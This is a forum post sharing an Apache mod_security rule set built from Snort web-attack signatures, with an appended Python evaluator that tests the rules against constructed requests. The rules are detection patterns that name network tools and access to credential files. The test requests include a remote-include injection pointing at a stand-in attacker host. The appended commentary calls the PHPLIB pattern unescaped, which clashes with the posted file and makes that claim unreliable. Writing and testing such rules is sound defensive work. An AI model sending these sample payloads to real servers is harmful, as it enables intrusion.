Hello,
OK, you're talking about network traffic, not CPU usage.
There are a lot of scanners that try to connect to your box or do DoS attacks, etc.
Maybe the traffic comes from this sort of problem.
I think you've installed APF?
If yes, just look at your /var/log/messages and /var/log/secure and try to figure out if there are a lot of DROP packets.
I recommend you also install BFD (Brute Force Detection) from rfxn.
And finally, you asked about mod_security.
So here is my rule set.
I have configured a file in /etc/httpd/conf.d/ named mod_security.conf.
Here is the file (mod_security.conf):
LoadModule security_module modules/mod_security.so
<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On
# Change Server: string
SecServerSignature " "
# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On
# This setting should be set to On only if the Web site is
# using the Unicode encoding. Otherwise it may interfere with
# the normal Web site operation.
SecFilterCheckUnicodeEncoding Off
# Only allow bytes from this range
SecFilterForceByteRange 1 255
# The audit engine works independently and
# can be turned On or Off on the per-server or
# on the per-directory basis. "On" will log everything,
# "DynamicOrRelevant" will log dynamic requests or violations,
# and "RelevantOnly" will only log policy violations
SecAuditEngine RelevantOnly
# The name of the audit log file
SecAuditLog /var/log/httpd/audit_log
# Should mod_security inspect POST payloads
SecFilterScanPOST On
# Action to take by default
SecFilterDefaultAction "deny,log,status:500"
# Require HTTP_USER_AGENT and HTTP_HOST in all requests
SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"
# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"
# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
# Import our snort converted modsec rules
Include /etc/httpd/conf.d/mod_sec.snort.conf
</IfModule>
You may see that I have an Include directive which pulls in another file (mod_sec.snort.conf) to complete the rules.
Why another file?
It easily allows me to remove these rules when my server is very busy.
mod_sec.snort.conf is my dedicated, personal file built from the Snort rules.
Here is the file (mod_sec.snort.conf):
# WEB-ATTACKS ps command attempt
SecFilterSelective THE_REQUEST "/bin/ps"
# WEB-ATTACKS /bin/ps command attempt
SecFilterSelective THE_REQUEST "ps\x20"
# WEB-ATTACKS wget command attempt
SecFilter "wget\x20"
# WEB-ATTACKS uname -a command attempt
SecFilter "uname\x20-a"
# WEB-ATTACKS /usr/bin/id command attempt
SecFilterSelective THE_REQUEST "/usr/bin/id"
# WEB-ATTACKS id command attempt
SecFilter ";id"
# WEB-ATTACKS kill command attempt
SecFilterSelective THE_REQUEST "/bin/kill"
# WEB-ATTACKS chsh command attempt
SecFilterSelective THE_REQUEST "/usr/bin/chsh"
# WEB-ATTACKS tftp command attempt
SecFilter "tftp\x20"
# WEB-ATTACKS /usr/bin/gcc command attempt
SecFilterSelective THE_REQUEST "/usr/bin/gcc"
# WEB-ATTACKS gcc command attempt
SecFilter "gcc\x20-o"
# WEB-ATTACKS /usr/bin/cc command attempt
SecFilterSelective THE_REQUEST "/usr/bin/cc"
# WEB-ATTACKS cc command attempt
SecFilter "cc\x20"
# WEB-ATTACKS /usr/bin/cpp command attempt
SecFilterSelective THE_REQUEST "/usr/bin/cpp"
# WEB-ATTACKS cpp command attempt
SecFilter "cpp\x20"
# WEB-ATTACKS /usr/bin/g++ command attempt
SecFilterSelective THE_REQUEST "/usr/bin/g++"
# WEB-ATTACKS g++ command attempt
SecFilter "g++\x20"
# WEB-ATTACKS bin/python access attempt
SecFilterSelective THE_REQUEST "bin/python"
# WEB-ATTACKS python access attempt
SecFilter "python\x20"
# WEB-ATTACKS bin/tclsh execution attempt
SecFilter "bin/tclsh"
# WEB-ATTACKS tclsh execution attempt
SecFilter "tclsh8\x20"
# WEB-ATTACKS bin/nasm command attempt
SecFilterSelective THE_REQUEST "bin/nasm"
# WEB-ATTACKS nasm command attempt
SecFilter "nasm\x20"
# WEB-ATTACKS perl execution attempt
SecFilter "perl\x20"
# WEB-ATTACKS traceroute command attempt
SecFilter "traceroute\x20"
# WEB-ATTACKS ping command attempt
SecFilterSelective THE_REQUEST "/bin/ping"
# WEB-ATTACKS netcat command attempt
SecFilter "nc\x20"
# WEB-ATTACKS nmap command attempt
SecFilter "nmap\x20"
# WEB-ATTACKS xterm command attempt
SecFilterSelective THE_REQUEST "/usr/X11R6/bin/xterm"
# WEB-ATTACKS X application to remote host attempt
SecFilter "\x20-display\x20"
# WEB-ATTACKS lsof command attempt
SecFilter "lsof\x20"
# WEB-ATTACKS rm command attempt
SecFilter "rm\x20"
# WEB-ATTACKS mail command attempt
SecFilterSelective THE_REQUEST "/bin/mail"
# WEB-ATTACKS mail command attempt
SecFilter "mail\x20"
# WEB-ATTACKS /bin/ls command attempt
SecFilterSelective THE_REQUEST "/bin/ls"
# WEB-ATTACKS /etc/shadow access
SecFilter "/etc/shadow"
# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST ".htgroup"
# WEB-CGI websitepro path access
SecFilter " /HTTP/1."
# WEB-CGI formmail arbitrary command execution attempt
SecFilterSelective THE_REQUEST "/formmail" chain
SecFilter "\x0a"
# WEB-CGI formmail access
SecFilterSelective THE_REQUEST "/formmail" log,pass
# WEB-CGI phf arbitrary command execution attempt
SecFilterSelective THE_REQUEST "/phf" chain
SecFilter "\x0a/"
# WEB-CGI phf access
SecFilterSelective THE_REQUEST "/phf" log,pass
# WEB-CGI rksh access
SecFilterSelective THE_REQUEST "/rksh"
# WEB-CGI bash access
SecFilterSelective THE_REQUEST "/bash" log,pass
# WEB-CGI zsh access
SecFilterSelective THE_REQUEST "/zsh"
# WEB-CGI csh access
SecFilterSelective THE_REQUEST "/csh"
# WEB-CGI tcsh access
SecFilterSelective THE_REQUEST "/tcsh"
# WEB-CGI rsh access
SecFilterSelective THE_REQUEST "/rsh"
# WEB-CGI ksh access
SecFilterSelective THE_REQUEST "/ksh"
# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter "javascript://"
# WEB-MISC cross site scripting (img src=javascript) attempt
SecFilter "img src=javascript"
# WEB-MISC .htpasswd access
SecFilter ".htpasswd"
# WEB-MISC .htaccess access
SecFilter ".htaccess"
# WEB-MISC cd..
SecFilter "cd.."
# WEB-MISC ///cgi-bin access
SecFilterSelective THE_REQUEST "///cgi-bin"
# WEB-MISC /cgi-bin/// access
SecFilterSelective THE_REQUEST "/cgi-bin///"
# WEB-MISC /~root access
SecFilterSelective THE_REQUEST "/~root"
# WEB-MISC /~ftp access
SecFilterSelective THE_REQUEST "/~ftp"
# WEB-MISC cat%20 access
SecFilter "cat\x20"
# WEB-MISC rpm_query access
SecFilterSelective THE_REQUEST "/rpm_query"
# WEB-MISC htgrep attempt
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"
# WEB-MISC htgrep access
SecFilterSelective THE_REQUEST "/htgrep" log,pass
# WEB-MISC .history access
SecFilterSelective THE_REQUEST "/.history"
# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST "/.bash_history"
# WEB-MISC /~nobody access
SecFilterSelective THE_REQUEST "/~nobody"
# WEB-MISC *%0a.pl access
SecFilterSelective THE_REQUEST "/*\x0a.pl"
# WEB-MISC Apache Chunked-Encoding worm attempt
SecFilter "CCCCCCC: AAAAAAAAAAAAAAAAAAA"
# WEB-MISC Transfer-Encoding: chunked
SecFilter "chunked"
# WEB-PHP squirrel mail theme arbitrary command attempt
SecFilterSelective THE_REQUEST "/left_main.php" chain
SecFilter "cmdd="
# WEB-PHP DNSTools administrator authentication bypass attempt
SecFilterSelective THE_REQUEST "/dnstools.php" chain
SecFilter "user_dnstools_administrator=true"
# WEB-PHP DNSTools authentication bypass attempt
SecFilterSelective THE_REQUEST "/dnstools.php" chain
SecFilter "user_logged_in=true"
# WEB-PHP DNSTools access
SecFilterSelective THE_REQUEST "/dnstools.php" log,pass
# WEB-PHP Blahz-DNS dostuff.php modify user attempt
SecFilterSelective THE_REQUEST "/dostuff.php?action=modify_user"
# WEB-PHP Blahz-DNS dostuff.php access
SecFilterSelective THE_REQUEST "/dostuff.php" log,pass
# WEB-PHP PHP-Wiki cross site scripting attempt
SecFilterSelective THE_REQUEST "<script"
# WEB-PHP strings overflow
SecFilterSelective THE_REQUEST "?STRENGUR"
# WEB-PHP PHPLIB remote command attempt
# (the brackets are escaped so the pattern matches the literal parameter name
# "_PHPLIB[libdir]" instead of being read as a regex character class)
SecFilter "_PHPLIB\[libdir\]"
To create these files, do the following.
First, save your old security.conf file:
cd /etc/httpd/conf.d/
cp security.conf security.back
rm -f security.conf
Then create the mod_security.conf file and copy and paste mine:
touch mod_security.conf
vi mod_security.conf
press "Insert"
copy and paste my data
Finally, create the file mod_sec.snort.conf and copy and paste my data:
touch mod_sec.snort.conf
vi mod_sec.snort.conf
press "Insert"
copy and paste my data
Hope this will help you.
Pascal
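The rules posted above are plain substring regexes, so before copying them onto a busy server it is worth seeing what they actually match. The script below is an added example, not code from the post or from ModSecurity itself: it re-implements just enough of the ModSecurity 1.x SecFilter semantics (URL-decode, then regex-search the request line for SecFilter or a named location for SecFilterSelective, with "!" negation and "chain") to run a constructed excerpt of the two posted files against constructed requests. It assumes case-insensitive matching, that SecFilter scans the decoded request line and POST body, and that a missing ARG_/COOKIE_/HTTP_ location is treated as an empty string; rules using POSIX classes such as [[:space:]] are left out because Python's re does not support them. The run shows two true positives, two benign requests that "rm\x20" and "cc\x20" would deny, the formmail chain firing only when the newline is present, and that the posted "_PHPLIB[libdir]" pattern never fires until its brackets are escaped.

```python
"""Offline evaluator for a subset of the posted ModSecurity 1.x SecFilter rules.

Added example; assumptions (not verified against a real Apache): patterns are
case-insensitive, SecFilter scans the URL-decoded request line and POST body,
and a missing location (ARG_, COOKIE_, HTTP_) is matched as an empty string.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed excerpt of the posted mod_security.conf / mod_sec.snort.conf.
# The last rule is the escaped variant of "_PHPLIB[libdir]", added for contrast.
RULES_TEXT = r'''
# WEB-ATTACKS ps command attempt
SecFilterSelective THE_REQUEST "/bin/ps"
# WEB-ATTACKS rm command attempt
SecFilter "rm\x20"
# WEB-ATTACKS cc command attempt
SecFilter "cc\x20"
# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
# WEB-CGI formmail arbitrary command execution attempt
SecFilterSelective THE_REQUEST "/formmail" chain
SecFilter "\x0a"
# WEB-PHP PHPLIB remote command attempt (as posted: unescaped brackets)
SecFilter "_PHPLIB[libdir]"
# WEB-PHP PHPLIB remote command attempt (brackets escaped)
SecFilter "_PHPLIB\[libdir\]"
'''

# Constructed requests (hypothetical hosts and paths): attacks, benign
# look-alikes, and pairs that exercise the negated rule and the chain.
SAMPLE_REQUESTS = {
    'ps_in_query': {'method': 'GET', 'uri': '/cgi-bin/run.cgi?cmd=/bin/ps%20aux'},
    'benign_perm': {'method': 'GET', 'uri': '/docs/perm%20denied.html'},
    'benign_acc': {'method': 'GET', 'uri': '/search?q=acc%20number'},
    'bad_session': {'method': 'GET', 'uri': '/index.php?PHPSESSID=%3Cscript%3E'},
    'good_session': {'method': 'GET', 'uri': '/index.php?PHPSESSID=abc123'},
    'formmail_inject': {'method': 'GET', 'uri': '/cgi-bin/formmail.pl?recipient=x%0aMAIL'},
    'formmail_plain': {'method': 'GET', 'uri': '/cgi-bin/formmail.pl?recipient=x'},
    'phplib_inject': {'method': 'GET', 'uri': '/index.php?_PHPLIB[libdir]=http://attacker.example/'},
}

PATTERN_RE = re.compile(r'"((?:[^"\\]|\\.)*)"\s*(.*)$')


def parse_rules(text):
    """Parse SecFilter/SecFilterSelective lines; '#' comments become the rule description."""
    rules, desc = [], ''
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith('#'):
            desc = line.lstrip('# ')
            continue
        directive, rest = line.split(None, 1)
        location = None
        if directive == 'SecFilterSelective':
            location, rest = rest.split(None, 1)      # e.g. THE_REQUEST, ARG_x, HTTP_x|HTTP_y
        m = PATTERN_RE.match(rest)
        if not m:
            raise ValueError('unparsable rule: ' + line)
        pattern, actions = m.group(1), m.group(2)
        negate = pattern.startswith('!')              # "!regex" fires when regex does NOT match
        rules.append({
            'location': location,
            'regex': re.compile(pattern[1:] if negate else pattern, re.IGNORECASE),
            'negate': negate,
            'chain': 'chain' in actions.split(','),
            'desc': desc,
        })
    return rules


def request_values(req):
    """Build the URL-decoded strings each rule location is matched against."""
    headers = req.get('headers', {})
    body = req.get('body', '')
    line = f"{req['method']} {req['uri']} {req.get('version', 'HTTP/1.0')}"
    query = urlsplit(req['uri']).query
    args = parse_qs('&'.join(p for p in (query, body) if p), keep_blank_values=True)
    values = {'__DEFAULT__': [unquote(line), unquote(body)], 'THE_REQUEST': [unquote(line)]}
    for name, vals in args.items():                   # parse_qs already URL-decodes
        values['ARG_' + name] = vals
    for part in headers.get('Cookie', '').split(';'):
        if '=' in part:
            name, val = part.strip().split('=', 1)
            values['COOKIE_' + name] = [unquote(val)]
    for name, val in headers.items():
        values['HTTP_' + name.upper().replace('-', '_')] = [val]
    return values


def rule_matches(rule, values):
    """True if the rule fires on any of its locations (missing location == '')."""
    locations = rule['location'].split('|') if rule['location'] else ['__DEFAULT__']
    for loc in locations:
        for text in values.get(loc, ['']):
            found = rule['regex'].search(text) is not None
            if found != rule['negate']:
                return True
    return False


def evaluate(rules, req):
    """Return descriptions of the rules (or chains) that would deny this request."""
    values, hits, i = request_values(req), [], 0
    while i < len(rules):
        j, matched = i, True                          # a chain is every 'chain' rule plus the next one
        while True:
            matched = matched and rule_matches(rules[j], values)
            if not rules[j]['chain'] or j + 1 == len(rules):
                break
            j += 1
        if matched:
            hits.append(rules[i]['desc'])
        i = j + 1
    return hits


RULES = parse_rules(RULES_TEXT)


def run_all():
    return {name: evaluate(RULES, req) for name, req in SAMPLE_REQUESTS.items()}


if __name__ == '__main__':
    for name, hits in run_all().items():
        print(f"{name:16s} -> {hits or 'allowed'}")
```

The two benign hits are the practical cost of rules like "rm\x20" and "cc\x20": any decoded URL or POST field containing "perm " or "acc " gets a 500 from the default action, which is why the author keeps them in a separate Include that can be dropped. The PHPLIB pair shows the opposite failure: an unescaped "[libdir]" is a character class, so the rule silently never fires.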